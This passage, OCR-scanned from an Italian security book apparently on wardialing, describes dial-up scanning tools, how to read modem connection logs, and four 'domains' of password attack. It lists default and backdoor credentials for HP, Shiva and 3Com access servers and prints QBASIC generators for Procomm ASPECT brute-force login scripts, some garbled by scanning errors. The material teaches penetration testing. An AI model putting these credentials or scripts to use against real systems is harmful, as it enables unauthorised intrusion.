When the report was generated, PhoneSweep was configured to scan for both fax 
machines and modems. 


PhoneSweep was configured to only connect to modems, but not to identify or attempt to 
penetrate them. 


There were atotal of 176 simulated calls made in this profile when the report was 
generated. 


Figura 8.6 
Esempio di report PhoneSweep. 


gurare e gestire l'output degli strumenti freeware, i 1000 dollari della versione base 
possono essere un prezzo ragionevole. 


® TeleSweep Secure 


Diffusione: 9 
Semplicità: 51 
Impatto: 7 
Fattore di rischio: Pa 


Simile nella funzionalità a PhoneSweep, TeleSweep Secure è un altro prodotto 
emergente, venduto attualmente dalla Secure Logix, all'indirizzo http://www. secu - 
relogix.com. Abbiamo già esaminato le funzionalità di PhoneSweep, e TeleSweep 
Secure le ricorda molto da vicino; pertanto la nostra esposizione sarà assai sintetica. 
Come nel caso di PhoneSweep, c'è ben poco da dire che non sia già evidente 
nell’interfaccia del programma. 

Le caratteristiche che fanno emergere TeleSweep sono la sua interfaccia grafica, la 
pianificazione automatizzata, la personalizzazione dei messaggi di sistema, la pene- 
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trazione delle portanti, il supporto di modem multipli, la reportistica multilivello, e 
la possibilità di identificare automaticamente un gran numero di marche e modelli 
di dispositivi di accesso remoto. Inoltre, TeleSweep è facilmente configurabile per 
tenere in considerazione le ore lavorative (Business Hours) e non (Outside Hours), 
o i week-end, esattamente come PhoneSweep. Contrariamente a quest'ultimo tutta- 
via, TeleSweep non richiede alcuna chiave hardware speciale di sicurezza: inoltre, 
TeleSweep consente agli amministratori di gestire da remoto i modem di impresa, 
attraverso l'interfaccia denominata Dialer Manager. Questa caratteristica può essere 
assai utile agli amministratori per rivedere e tenere sotto controllo costante i modem 
da qualsiasi sede. Infine, TeleSweep fa uso dell'algoritmo di crittografia Triple DES 
per tutto il traffico di amministrazione che transita su Internet. Mentre questo testo 
viene scritto, TeleSweep Secure 3.0 dispone di una vasta gamma di funzionalità che 
lo rendono un'interessante alternativa a PhoneSweep. Come accadeva con Phone- 
Sweep, per poter considerare affidabili i risultati del test di penetrazione della rete 
di TeleSweep li si deve verificare con metodi diversi, dal momento che anche con 
questo software sono stati riscontrati casi di falsi esiti positivi. 


[ i 
° Tecniche di attacco delle portanti 


Diffusione: be; 
Semplicità: 5 
Impatto: 8 
Fattore di rischio: 7 


La stessa attività di wardialing potrebbe evidenziare modem poco protetti, ma il più del- 
le volte è necessario esaminare attentamente i report ed effettuare ulteriori tentativi ma- 
nuali per stabilire esattamente quanto sia vulnerabile una certa connessione telefonica. 
Per esempio, il seguente estratto (opportunamente epurato) di un file found. log di To- 
neLoc mostra la visualizzazione tipica dei risultati (non riportati per intero per brevità): 


7-NOV-2002 20:35:15 9,5551212 C: CONNECT 2400 


HP995-400:_ 
Expected a HELLO command. (CIERR 6057) 


7-NOV-2002 20:36:15 9,5551212 C: CONNECT 2400 


@ Userid: 
Password? 
Login incorrect 


7-NOV-2002 20:37:15 9,5551212 C: CONNECT 2400 


Welcome to 3Com Total Control HiPer ARC (TM) 
Networks That Go The Distance (TM) 

login: 

Password: 

Login Incorrect 


7-NOV-2002 20:38:15 9,5551212 C: CONNECT 2400 


. Please press <Enter>..._I PJack Smith » JACK SMITH 
[CARRIER LOST AFTER 57 SECONDS] 
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Abbiamo scelto di proposito questi esempi per chiarire una questione fondamentale 
sull'analisi dei log: un certo livello di esperienza con un buon numero di server dial-up 
e sistemi operativi diversi è assolutamente indispensabile. Per esempio, la prima risposta 
sembra provenire da un sistema HP ("HP995-400”), ma la successiva stringa a proposito 
di un fantomatico comando “HELLO” è piuttosto oscura. Anche collegandosi manual- 
mente a questo sistema con un normale software di terminale dati, impostato per l’emu- 
lazione di un terminale VT-100 con il protocollo ASCII, si ottengono risultati altrettanto 
imperscrutabili, a meno che l’hacker non conosca i sistemi Hewlett-Packard di livello in- 
termedio MPE-XL e sappia che la sintassi per il login è “HELLO USER.ACCT”, seguita 
dalla password, quando viene richiesta. In tal caso, si può effettuare questo tentativo: 


CONNECT 57600 
HP995-400: HELLO FIELD. SUPPORT 
PASSWORD= TeleSup 


“FIELD.SUPPORT” e “TeleSup” sono il nome e la password di un account predefini- 
to abbastanza comuni. Bastano un po’ di ricerca e una solida preparazione per rico- 
noscere i varchi dove gli altri vedono solo solide mura. 

Il secondo esempio è più semplice: la sintassi “@Userid” è tipica dei server per ac- 
cesso remoto LANRover della Shiva Corp (se ne può trovare ancora qualcuno, seb- 
bene Intel ne abbia sospeso la produzione). Sapendo questo, è sufficiente una velo- 
ce ricerca sul sito http://ww.intel.com/network/shiva/ per avere altre infor- 
mazioni sui LANRover. In questo caso si potrebbe tentare “supervisor” o “admin” 
con password nulla: sarete sorpresi di scoprire con quanta frequenza possa funzio- 
nare questa banalissima combinazione (colpa della pigrizia degli amministratori). 

Il terzo esempio sottolinea ulteriormente quanto possa essere devastante la cono- 
scenza anche generica del produttore e del modello del sistema che risponde. È 
nota l’esistenza di un account backdoor nei dispositivi di accesso remoto TotalCon- 
trol HiPer ARC della 3Com (“adm” con password nulla). In pratica, questo sistema è 
spalancato, a meno che nel frattempo non sia stata implementata una soluzione. 
L'ultimo esempio riporta la risposta tipica del software per controllo remoto pcAnywhe- 
re della Symantec. Se il proprietario del sistema “JACK SMITH" è abbastanza furbo e ha 
impostato una password anche solo minimamente complicata, probabilmente non vale 
la pena di perdere tempo su questo sistema, ma due utenti pcAnywhere su tre non si 
prendono mai il disturbo di impostarne una (sì, possiamo confermarlo personalmente). 
Vorremmo anche sottolineare come le portanti non siano l’unico oggetto interes- 
sante identificabile con una scansione di wardialing. Fra i trofei più desiderati dagli 
hacker troviamo anche centralini e sistemi di messaggistica vocale. In particolare, i 
centralini configurati in modo da consentire chiamate in uscita da remoto, rispon- 
dono con un secondo segnale di libero se viene fornito il codice corretto. Se non 
adeguatamente protette, queste funzionalità possono consentire all’hacker di effet- 
tuare chiamate ovunque nel mondo a spese vostre. Non trascurate questi aspetti 
quando presenterete l'esito dell'analisi di wardialing ai vostri superiori. 

La trattazione esaustiva delle possibili risposte fornite dai sistemi dial-up remoti ri- 
chiederebbe gran parte di questo libro, ma ci auguriamo di aver fornito qualche 
esempio significativo dei diversi sistemi che si possono incontrare durante lo studio 
della sicurezza di un’organizzazione. Cercate di mantenere una mentalità aperta, e 
chiedete consiglio ad altri, compresi i produttori. Probabilmente, potete ancora tro- 
vare documentazione riguardante gli attacchi dei banner e delle portanti sul sito 
Wall of Voodoo di Stephan Barnes, che è interamente dedicato alla comunità del 
wardialing, all'indirizzo Web ww.m4phrik.com: questo sito è stato sempre aggior- 
nato, durante le diverse edizioni di questo libro, sulla situazione del wardialing e 
dell’hacking dei centralini PBX e dei sistemi voice mail. 
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Supponiamo che abbiate trovato un sistema che richiede nome utente e password non 
banali. Come si procede? Si sperimentano attacchi basati su dizionari e forza bruta, ov- 
viamente! Come abbiamo già accennato, PhoneSweep e TeleSweep offrono funziona- 
lità per la decodifica delle password (sulle quali dovete fare doppio clic), ma per i fau- 
tori del fai-da-te esistono valide alternative, come Login Hacker di THC, che è sostan- 
zialmente un compilatore di script simil-DOS (alcuni script di esempio sono già com- 
presi). Abbiamo anche visto procedure più complesse, scritte nel linguaggio ASPECT 
di Procomm Plus, che fanno tre tentativi, richiamano dopo che il sistema target ha riag- 
ganciato, ne fanno altri tre, e così via. In generale, questo tipo di intrusione “rumorosa” 
è sconsigliabile nel caso di sistemi dial-up, ed è con ogni probabilità illegale se non 
siete i proprietari del sistema. Comunque, se dovete testare la sicurezza di sistemi di 
cui siete i proprietari, questo diventa in pratica un test di intrusione di forza bruta. 


Script di forza bruta: il metodo interno 


Una volta che sono disponibili i risultati ottenuti dall’output di una sessione wardia- 
ler, il passo successivo consiste nel classificare i risultati nei cosiddetti domini. 
Come abbiamo già detto, un certo livello di esperienza con un buon numero di ser- 
ver di accesso remoto e sistemi operativi diversi è assolutamente indispensabile. La 
scelta dei successivi sistemi da attaccare dipende da una serie di fattori, tra cui il 
tempo a disposizione, lo sforzo e la capacità computazionale a disposizione e le ca- 
pacità personali di programmazione degli script. 
Richiamare i modem in ascolto individuati in precedenza, utilizzando un semplice 
software di comunicazione, è il primo passo fondamentale per cercare di inserire i ri- 
sultati nei domini da utilizzare poi per i tentativi di intrusione. Quando si esegue una 
chiamata su una connessione in ascolto, è importante cercare di capire le caratteristi- 
che della connessione. Questo tornerà utile nel momento in cui cercheremo di rag- 
gruppare le connessioni individuate in domini per i successivi tentativi di intrusione. 
Una connessione modem è caratterizzata da alcuni importanti fattori che è bene tene- 
re presente in fase di creazione degli script. In generale è necessario identificare: 
e se la connessione è caratterizzata da una soglia temporale o basata sul nu- 
mero di tentativi di connessione; 
e se il superamento della soglia rende la connessione inutilizzabile, come tal- 
volta accade; 
e seè possibile eseguire la connessione solo in determinati momenti; 
e se è possibile ipotizzare il livello di autenticazione (ovvero, di tipo solo 
nome utente o nome utente e password); 
@ se la connessione dispone di un metodo di identificazione univoco che as- 
somiglia a una risposta a una parola challenge del tipo SecureID; 
e seè possibile determinare il numero massimo di caratteri in risposta ai cam- 
pi nome utente e password; 
e seè possibile ottenere informazioni aggiuntive sul carattere alfanumerico 0 
speciale dei campi nome utente o password; 
e se è possibile ottenere informazioni aggiuntive digitando altri tipi di se- 
quenze di interruzione come per esempio CTRL-C, CTRL-Z, ?, e così via; 
e seibanner di sistema sono disponibili o sono stati modificati rispetto ai pri- 
mi tentativi di ricerca eseguiti e il tipo di informazione esposta. Queste in- 
formazioni possono essere utili contro i tentativi di attacco o l’utilizzo di no- 
zioni di ingegneria sociale. 
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Una volta in possesso di queste informazioni, è possibile di solito inserire le con- 
nessioni in quelli che a grandi linee vengono denominati domini di intrusione tra- 
mite wardialing. A scopo illustrativo, possiamo dire che in genere è necessario 
prendere in considerazione quattro domini, per effettuare una penetrazione della 
rete mediante tecniche semplici per tentativi successivi: la zona che per prima dovrà 
essere espugnata prenderà il nome di LHF (Low Hanging Fruit, letteralmente “frutto 
facilmente raggiungibile”), e deve essere quella che produce maggiori risultati in 
termini di possibilità offerte all’intrusore. Gli altri domini da forzare si basano so- 
prattutto sul numero dei meccanismi di autenticazione e sul numero dei tentativi 
consentiti per tentare di accedere a essi. Prima di utilizzare tecniche di attacco a for- 
za bruta sappiate che la loro percentuale di successo è molto inferiore a quella 
dell'attacco LHF, ma che nonostante tutto vi spiegheremo in dettaglio come scrivere 
uno script di questo tipo, se vorrete proseguire nella lettura. Pertanto, è possibile 
classificare i domini come mostrato nella tabella seguente. 


LHF («Low Hanging Fruit», 
ossia «Frutto facilmente rag- 
giungibile») 

Autenticazione singola, nu- 
mero illimitato di tentativi 


Autenticazione singola, nu- 
mero limitato di tentativi 


Autenticazione doppia, nu- 


Password utilizzate più comunemente o di facile indivi- 
duazione per sistemi identificabili (qui conta l'esperien- 
za). 

Sistemi con un solo tipo di password o nome utente e in 
cui la connessione modem non viene interrotta dopo un 
certo numero di tentativi falliti. 


Sistemi con un solo tipo di password o nome utente, in 
cui la connessione modem viene interrotta dopo un nu- 
mero predefinito di tentativi falliti. 


Sistemi con due tipi di meccanismi di autenticazione, per 


mero illimitato di tentativi esempio nome utente e password, e in cui la connessio- 
ne modem non viene interrotta dopo un numero prede- 
finito di tentativi falliti.* 

Sistemi con due tipi di meccanismi di autenticazione, per 
esempio nome utente e password, e in cui la connessio- 
ne modem viene interrotta dopo un numero predefinito 
di tentativi falliti.* 


5. Autenticazione doppia, nu- 
mero limitato di tentativi 


* L’autenticazione doppia è un'autenticazione a due fattori non comune, in cui all’utente viene ri- 
chiesto di fornire due tipi di credenziali: qualcosa che ha e qualcosa che conosce. 


In generale, più si scende nell'elenco dei domini, più tempo è richiesto per intro- 
dursi nel sistema. Scendendo nell’elenco dei domini, il processo di script diventa 
più critico a causa del numero di azioni che devono essere eseguite. Esaminiamo 
ora in maniera più approfondita i diversi domini. 


® Low-Hanging Fruit 


Diffusione: 10 
Semplicità: 9 
Impatto: 10 
Fattore di rischio: 10 


Questo dominio delle connessioni telefoniche è quello che richiede meno tempo e 
se siete fortunati è anche quello che vi dà una soddisfazione immediata. Poiché non 
richiede script, è basato essenzialmente su un processo di deduzione. Sarebbe im- 
possibile elencare tutti i nomi utente e le password più comuni utilizzate per tutti i 
sistemi che accettano chiamate in entrata; quindi non ci proveremo. In questo testo 
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e su Internet abbondano gli elenchi e i riferimenti che possono essere utilizzati per 
provare a indovinare i nomi utente e le password: uno di questi esempi su Internet 
è disponibile all'indirizzo http://ww.sat.mksecure.com/defpw/ e contiene uten- 
ti e password predefiniti per molti sistemi conosciuti. Anche in questo caso, l’espe- 
rienza che deriva dall'avere esaminato una moltitudine di risultati prodotti da ses- 
sioni di wardialing è di notevole aiuto, 

La possibilità di identificare la firma o l’immagine di un certo tipo di sistema dial-up 
consente di gettare le basi da cui partire per utilizzare i nomi utente e le password 
predefinite del sistema. Qualunque sia l'elenco utilizzato o consultato, il segreto 
consiste nel non impiegare più del tempo necessario per esaurire tutte le combina- 
zioni di nome utente e password predefinite, e in caso di insuccesso passare al do- 
minio successivo. 


ig 
® Autenticazione singola, numero illimitato di tentativi 


Diffusione: 9 
Semplicità: te) 
Impatto: 10 
Fattore di rischio: 9 


Il nostro primo dominio attaccato a forza bruta è in teoria quello che richiede meno 
tempo per accedere al sistema (a parte LHF), ma può anche essere quello più diffi- 
cile da catalogare. Infatti ciò che può sembrare un meccanismo di autenticazione 
singola, come quello mostrato nell'esempio seguente (si veda il Listato 8.1a), po- 
trebbe rivelarsi un’autenticazione doppia, dopo che è stato individuato il nome 
utente corretto (si veda il Listato 8.1b). 

Un esempio di primo dominio vero e proprio è mostrato nel Listato 8.2, in cui viene 
raffigurato un meccanismo di autenticazione singola che consente un numero illimi- 
tato di tentativi di deduzione. 


Listato 8.1a = Esempio di quello che sembra essere un primo dominio 
e che potrebbe cambiare se viene inserito il nome utente corretto 


XX-Jul-XX 09:51:08 91XXX5551234 C: CONNECT 9600/ARO/V32/LAPM 
Userid: 
Userid: 
Userid: 
Userid: 
Userid: 
Userid: 
Userid: 


DODO PP 


Listato 8.1b = Esempio che mostra il cambiamento di dominio 
dopo che è stato inserito il nome utente corretto 


XX-JUl-XX 09:55:08 91XXX5551234 C: CONNECT 9600/ARQ/V32/LAPM 
@ Userid: lanroverl 
Password: XxXXXXXX 


Nel nostro esempio di primo dominio (si veda il Listato 8.2), per accedere al sistema 
target è sufficiente conoscere una password. Notate inoltre che questa connessione 
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consente un numero illimitato di tentativi. Il passo successivo è allora la scrittura di 
uno script di forza bruta che utilizza un dizionario delle password. 


Listato 8.2 Esempio di primo dominio vero e proprio 


XX-Jul-XX 03:45:08 91XXX5551235 C: CONNECT 9600/ARQ/V32/LAPM 


Enter Password: 
Invalid Password. 


Enter Password: 
Invalid Password. 


Enter Password: 
Invalid Password. 


Enter Password: 
Invalid Password. 


Enter Password: 
Invalid Password. 


Dobbiamo ora scrivere lo script per il nostro esempio di primo dominio. A tale sco- 
po è sufficiente disporre di un semplice programma di utilità ASCII. Non sono ri- 
chieste capacità di programmazione avanzate, ma piuttosto un minimo di abilità 
nello scrivere, compilare ed eseguire uno script che consenta la ripetizione dei ten- 
tativi di connessione per il numero di volte richiesto dal dizionario delle password. 
Come abbiamo già accennato, uno degli strumenti più utilizzati per la scrittura di 
script per le comunicazioni via modem è Procomm Plus e il suo linguaggio di scrip- 
ting ASPECT. Procomm Plus esiste da qualche anno e ha superato i test di utilizzabi- 
lità per il passaggio dalle prime versioni DOS a quelle più recenti a 32 bit. Inoltre, la 
guida in linea e la documentazione a esso associata sono eccellenti. 

Il primo obiettivo del nostro esercizio di scripting consiste nell’ottenere un file di 
codice sorgente contenente uno script e quindi trasformare lo script in modulo 0g- 
getto. Una volta ottenuto il modulo oggetto, dovremo verificarne l’utilizzabilità su 
un campione di 10-20 password per poi passare a un dizionario più esteso. Il primo 
passo consiste pertanto nel creare un sorgente ASPECT. Nelle vecchie versioni di 
Procomm Plus i sorgenti prendevano l'estensione .ASP, mentre i file oggetto pren- 
devano l'estensione .ASX. Alcune vecchie versioni di Procomm Plus, come il soft- 
ware per il testing dei drive PCPLUSTD (potete trovare istruzioni sul suo utilizzo e la 
sua installazione sul sito http://ww.m4phrik.com), permettevano di eseguire un 
codice .ASP sorgente durante l'esecuzione di uno script. Nelle nuove versioni a in- 
terfaccia grafica di Procomm Plus, i file sorgente e oggetto vengono identificati ri- 
spettivamente con le estensioni WAS e .WSX. Indipendentemente dalla versione, 
l’obiettivo è sempre lo stesso: creare uno script di forza bruta durevole e che possa 
essere utilizzato su un dizionario di grandi dimensioni. 

La creazione di uno script è un esercizio relativamente di basso livello, e in genere 
può essere portato a termine utilizzando un qualsiasi editor di testo. La parte diffici- 
le è assegnare una password o un'altra variabile del dizionario come argomento 
dello script. Procomm Plus è in grado di gestire file esterni che possono essere pas- 
sati allo script come variabili password (diciamo da un elenco di dizionari), durante 
l'esecuzione dello script. Potreste provare con un elenco di password memorizzate 
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all’interno di uno script, oppure con chiamate esterne a file di password: la riduzio- 
ne del numero delle variabili di programma durante l'esecuzione di uno script in- 
crementa ragionevolmente le possibilità di successo dell’attacco. 

Poiché il nostro approccio è fondamentalmente basato sulla codifica ASCII e relativa- 
mente di basso livello, per creare lo script possiamo utilizzare l'applicazione DOS 
QBASIC. Il listato di codice riportato di seguito mostra un semplice file QBASIC, uti- 
lizzato per creare lo script dell'esempio precedente. Chiameremo questo file 
5551235.BAS (estensione .BAS per QBASIC). Questo programma può essere utilizzato 
per creare lo script richiesto per tentare un attacco a forza bruta al nostro esempio di 
primo dominio. Quanto segue è un esempio di un programma QBASIC che crea uno 
script ASPECT per un file sorgente (.WAS) Procomm Plus 32 utilizzando l'esempio di 
primo dominio precedente e un dizionario delle password. Lo script completo pre- 
suppone che l'utente crei inizialmente la voce 5551235 nella directory dei numeri di 
telefono di Procomm Plus. La voce creata possiede in genere tutte le caratteristiche 
della connessione e consente all'utente di specificare un file di log. La possibilità di 
disporre di un file di log è fondamentale quando si tenta un attacco con script di forza 
bruta, utilizzando i tipi di approccio che verranno presentati in seguito: 


'QBASIC ASP/WAS script creator for Procomm Plus 
'Written by M4phrik, www.m4phr1k.com, Stephan Barnes 


OPEN "5551235.was" FOR OUTPUT AS #2 

OPEN "LIST.txt" FOR INPUT AS #1 

PRINT #2, "proc main" 

PRINT #2, "dial DATA " + CHR$(34) + "5551235" + CHR$(34) 
DO UNTIL EOF(1) 

LINE INPUT #1, in$ 

in$ = LTRIM$(ins) + "°M" 

PRINT #2, "waitfor " + CHR$(34) + "Enter Password:" + CHR$(34) 
PRINT #2, "transmit " + CHR$(34) + in$ + CHR$(34) 

LOOP 

PRINT #2, "endproc" 


I dizionari delle password più diffuse possono contenere un numero qualsiasi di 
parole comuni, comprese le seguenti: 


apple 

applet 
apple2 
applepie 
applepies 
applepiesi 
applepies2 
applicate 
applicates 
application 
applicationi 
applonia 
applonial 
(and so on.) 


e così via. 
È possibile utilizzare dizionari di qualsiasi dimensione, l’unico limite è rappresenta- 
to dall'immaginazione personale. Se disponete di informazioni aggiuntive sull’orga- 
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nizzazione obiettivo dell’attacco, come per esempio nomi e cognomi 0 gruppi spor- 
tivi locali, potete aggiungere queste parole al dizionario. L'obiettivo è creare un di- 
zionario sufficientemente robusto per individuare una password valida sul sistema 
obiettivo. Il passaggio successivo consiste nel portare il file 5551235.WAS nel com- 
pilatore ASPECT, compilarlo e quindi eseguire lo script. 


En Poiche questo script esegue dei tentativi ripetuti di deduzione delle pass- 

Rg word, prima di eseguire lo script assicuratevi di attivare la modalità di re- 
gistrazione. Questo consente di registrare l’intera sessione di script su un 
file che può essere successivamente esaminato per stabilire se il tentativo è 
andato a buon fine. A questo punto vi starete chiedendo perché non codi- 
ficare anche l'attesa di un evento andato a buon fine (l'ottenimento della 
password corretta). La risposta è semplice. Poiché non è noto a priori ciò 
che verrà visualizzato una volta individuata la password, l'attesa non 
può essere codificata. Nello script potrete solo inserire casi di parametri di 
login anomali, sulla base dei quali condurre la vostra elaborazione del fi- 
le: riportando tali anomalie in un file, potrete analizzarle in un secondo 
tempo o riutilizzarle all’interno di tecniche LHF. Se però è noto il risultato 
conseguente all'individuazione della password, è possibile codificare nel 
codice ASPECT un ciclo di attesa WAITFOR qualunque sia la risposta vali- 
da e impostare un flag quando la condizione attesa viene soddisfatta. Più 
variabili di sistema sono processate nel corso dell'esecuzione dello script, e 
più opportunità hanno di accadere degli eventi causali. Il processo di re- 
gistrazione del log di sessione è semplice da implementare ma particolar- 
mente lungo e noioso da esaminare. Durante il processo di script occorre 
tuttavia tenere presenti altre questioni importanti: basta un semplice erro- 
re di spaziatura tra i caratteri in attesa di invio o inviati per rendere inva- 
lido tutto lo script. Per questo è opportuno verificare lo script utilizzando 
10-20 password un paio di volte per essere sicuri che questo esercizio ripe- 
titivo possa essere applicato anche su un numero di tentativi ripetuti mol- 
to più grande e per molto più tempo. In definitiva, ogni sistema è diverso 
dagli altri e la realizzazione di uno script per attacco di forza bruta con 
un ampio dizionario richiede la manipolazione dello script stesso per de- 
terminare quei parametri di sistema che gli consentano di operare nel 
tempo. 


® Autenticazione singola, numero limitato di tentativi 


Diffusione: 8 
Semplicità: 9 
Impatto: 9 
Fattore di rischio: 9 


Il secondo dominio è quello che richiede il maggior tempo di accesso al sistema. 
Questo perché è necessario aggiungere allo script un componente. Utilizzando gli 
esempi mostrati finora, esaminiamo nuovamente il risultato di un secondo dominio 
nel Listato 8.3. Noterete una piccola differenza rispetto al primo dominio: dopo tre 
tentativi di connessione viene visualizzato il carattere “ATHO”, 

Si tratta del tipico carattere Hayes che segnala il termine della chiamata. Questo si- 
gnifica che la connessione viene interrotta dopo tre tentativi falliti. Potrebbero esse- 
re quattro, cinque, sei o qualsiasi altro numero, ma lo scopo qui è verificare che 


| a 
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sappiate come eseguire il dial-back della connessione dopo X (3, in questo esem- 
pio) tentativi. La soluzione consiste nell’aggiungere codice al nostro esempio, per 
gestire la richiamata che segue l'ottenimento dell'accesso al sistema e la conseguen- 
te disconnessione del modem, come mostrato nel Listato 8.4. Sostanzialmente que- 
sto significa eseguire tre tentativi di ricerca della password, richiamare dopo che la 
connessione è stata interrotta e riavviare il processo. 


Listato 8.3 Esempio di secondo dominio vero e proprio 


XX-JUl-XX 03:45:08 91XXX5551235 C: CONNECT 9600/ARQ/V32/LAPM 


Enter Password: 
Invalid Password. 


Enter Password: 
Invalid Password. 


Enter Password: 
Invalid Password. 
ATHO 


(Notate la presenza del carattere Hayes “ATHO” che indica che la connessione è sta- 
ta interrotta e il sistema ha riagganciato.) 


Listato 8.4 = Esempio di programma QBASIC (denominato 555|235,BAS) 


'QBASIC ASP/WAS script creator for Procomm Plus 
'Written by M4phrik, www.m4phrik.com, Stephan Barnes 


OPEN "5551235.was" FOR OUTPUT AS #2 

OPEN "LIST.txt" FOR INPUT AS #1 

PRINT #2, "proc main" 

DO UNTIL EOF(1) 

PRINT #2, "dial DATA " + CHR$(34) + "5551235" + CHR$(34) 

LINE INPUT #1, in$ 

in$ = LTRIM$(in$) + "°M" 

PRINT #2, "waitfor " + CHR$(34) + "Enter Password:" + CHR$(34) 
PRINT #2, "transmit " + CHR$(34) + in$ + CHR$(34) 

LINE INPUT #1, in$ 

ing = LTRIM$(in$) + "°M" 

PRINT #2, "waitfor " + CHR$(34) + "Enter Password:" + CHR$(34) 
PRINT #2, "transmit " + CHR$(34) + ing + CHR$(34) 

LINE INPUT #1, in$ 

in$ = LTRIM$(in$) + "°M" 

PRINT #2, "waitfor " + CHR$(34) + "Enter Password:" + CHR$(34) 
PRINT #2, "transmit " + CHR$(34) + in$ + CHR$(34) 

LOOP 

PRINT #2, "endproc" 
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E) Autenticazione doppia, numero illimitato di tentativi 


Diffusione: 6 
Semplicità: 9 
Impatto: s 
Fattore di rischio: 8 


Il terzo dominio è costruito a partire dal primo dominio. Poiché però ora ci sono 
due cose da indovinare (a condizione che il nome utente non sia già noto), il tempo 
richiesto è in teoria superiore rispetto a quello del primo e del secondo dominio, 
Vorremmo anche sottolineare che il processo di script di questo terzo dominio e di 
quello successivo (il quarto) è più critico, perché in teoria il numero di informazioni 
sull'attività della tastiera che devono essere trasferite al sistema target è maggiore, e 
maggiore è quindi la probabilità che qualcosa vada storto. Gli script utilizzati per 
implementare questo tipo di approcci a forza bruta sono simili a quelli mostrati in 
precedenza. Il Listato 8.5 mostra il sistema target mentre il Listato 8.6 mostra un 
esempio di programma QBASIC utilizzato per creare lo script ASPECT. 


Listato 8.5 Esempioditerzo dominio obiettivo 


XX-JUl-XX 09:55:08 91XXX5551234 C: CONNECT 9600/ARO/V32/LAPM 


Username: guest 
Password! xXxXXXXX 
Username: guest 
Password: xXXXXXXX 
Username: guest 
Password: xXXXXXXX 
Username: guest 
Password: xXxXXXXXX 
Username: guest 
Password: XxXXXXXXXx 
Username: guest 
Password: xXXXXXXX 


Listato 8.6 = Esempio di programma QBASIC (denominato 555 | 235.BAS) 


'QBASIC ASP/WAS script creator for Procomm Plus 
'Written by M4phrik, www.m4phrik.com, Stephan Barnes 


OPEN "5551235.was" FOR OUTPUT AS #2 

OPEN "LIST.txt" FOR INPUT AS #1 

PRINT #2, "proc main" 

PRINT #2, "dial DATA " + CHR$(34) + "5551235" + CHR$(34) 
DO UNTIL EOF(1) 

LINE INPUT #1, in$ 

in$ = LTRIM$(in$) + "©M" 

PRINT #2, "waitfor " + CHR$(34) + "Username:" + CHR$(34) 
PRINT #2, "transmit " + CHR$(34) + "guest" + CHR$(34) 
PRINT #2, "waitfor " + CHR$(34) + "Password:" + CHR$(34) 
PRINT #2, "transmit " + CHR$(34) + in$ + CHR$(34) 

LOOP 

PRINT #2, "endproc" 
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® Autenticazione doppia, numero limitato di tentativi 


Diffusione: 3 
Semplicità: 10 
Impatto: 8 
Fattore di rischio: 7 


Il quarto dominio è costruito a partire dal terzo dominio. Poiché però ora ci sono 
due cose da indovinare (a condizione che il nome utente non sia già noto) ed è ne- 
cessario eseguire il clial-back dopo un numero predefinito di tentativi, in teoria que- 
sto processo è quello che richiede più tempo di esecuzione tra quelli visti finora. Gli 
script utilizzati per costruire questo tipo di approcci sono simili concettualmente a 
quelli illustrati in precedenza. ll Listato 8.7 che segue mostra i risultati di un amacco 
al sistema carget, mentre il Listato 8.8 mostra un esempio di programma QBASIC uti 
lizzato per creare lo script ASPECT. 


Listato 8.7 Esempio di quarto dominio obiettvo 


XX-Jul-XX 09:55:08 91XXX5551234 C: CONNECT 9600/ARO/V32/LAPM 


Username: guest 
Password: xXXXXXXX 
Username: quest 
Password: XXXXXXXX 
Username: guest 
Password: xXXXXXXX 
+++ 


Listato 8.8 Esempio di programma OBASIC (denominato 555 | 235.BAS) 


'AQBASIC ASP/WAS script creator for Procomm Plus 
‘Written by M4phr1k, www.m4phr1k.com, Stephan Barnes 


OPEN "5551235.was" FOR OUTPUT AS #2 

OPEN "LIST.txt® FOR INPUT AS #1 

PRINT #2, "proc main" 

DO UNTIL EOF(1) 

PRINT #2, "dial DATA " + CHR$(34) + "5551235" + CHRS(34) 
LINE INPUT #1, in$ 

in$ = LTRIMS(in$) + "©M" 

PRINT #2, “waitfor “ + CHR$(34) + "Username:" + CHR${34) 
PRINT #2, "transmit " + CHAS(34) +» "guest" + CHR$(34) 
PRINT #2, "waitfor “ + CHR$(34) + "Password:" + CHR$(34) 
PRINT #2, “transmit " + CHAS(34) + in$ + CHRS(34) 

LINE INPUT #1, in$ 

ins = LTRIMS(in$) + "*M" 

PRINT #2, “waitfor " + CHR$(34) + "Username; " + CHR$(34) 
PRINT #2, “"transmit " + CHA$(34) + "guest" + CHR$(34) 
PRINT #2, "waitfor " + CHR$(34) + "Password:" + CHR$(94) 
PRINT #2, "transmit " + CHAS(34) + in$ + CHR$(34) 

LINE INPUT #1, in$ 

in$ = LTRIMS(in$) + "°M" 


L= co——_ 
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PRINT #2, "waitfor " + CHR$(34) + "Username:" + CHR$(34) 
PRINT #2, "transmit " + CHR$(34) + "guest" + CHR$(34) 
PRINT #2, "waitfor " + CHR$(34) + "Password:" + CHR$(34) 
PRINT #2, "transmit " + CHR$(34) + in$ + CHR$(34) 

LOOP 

PRINT #2, "endproc" 


Per concludere 


Quelli illustrati sono esempi funzionanti eseguiti su sistemi che abbiamo personal- 
mente osservato. I file di output e una trattazione dettagliata di questo argomento 
sono disponibili all'indirizzo Web http://ww.m4phrik.com.I risultati ottenuti pos- 
sono essere diversi a causa di particolari condizioni del processo di script, di cui po- 
trebbe essere necessario tenere conto. Il processo è per tentativi ripetuti fino a 
quando non viene trovato lo script che funziona bene per quella particolare situa- 
zione. Probabilmente ci sono altri linguaggi che potrebbero essere utilizzati per ese- 
guire le stesse funzioni, ma per motivi di semplicità e brevità preferiamo rimanere 
fedeli ai semplici metodi basati su codice ASCII. Ancora una volta, vi ricordiamo che 
questi processi richiedono l'attivazione di un file di log prima di essere eseguiti, poi- 
ché nessuno degli script di esempio contempla l'elaborazione di un file. È facile far 
funzionare correttamente uno script per poi scoprire dopo ore di esecuzione che 
non esiste un file di log. Ricordate che stiamo cercando di risparmiarvi i grattacapi. 
Alcuni di voi si staranno chiedendo cosa è successo alle connessioni ISDN (ntegra- 
ted Services Digital Network). Tranquilli, sono ancora vive anche se stanno perden- 
do popolarità. Questo tipo di connessioni rappresentavano l’unica soluzione per 
quelle reti aziendali che desideravano un supporto di connessione più veloce. Al 
giorno d’oggi, le connessioni Internet veloci hanno ampiamente soppiantato le con- 
nessioni ISDN, e molte aziende le stanno eliminando. Vi state chiedendo quando fi- 
nalmente parleremo di come tappare tutti i buchi nella sicurezza che abbiamo evi- 
denziato? La risposta arriva subito. 


Misure di sicurezza per le connessioni telefoniche 


Abbiamo cercato di semplificare il più possibile le cose: un elenco numerato di ele- 
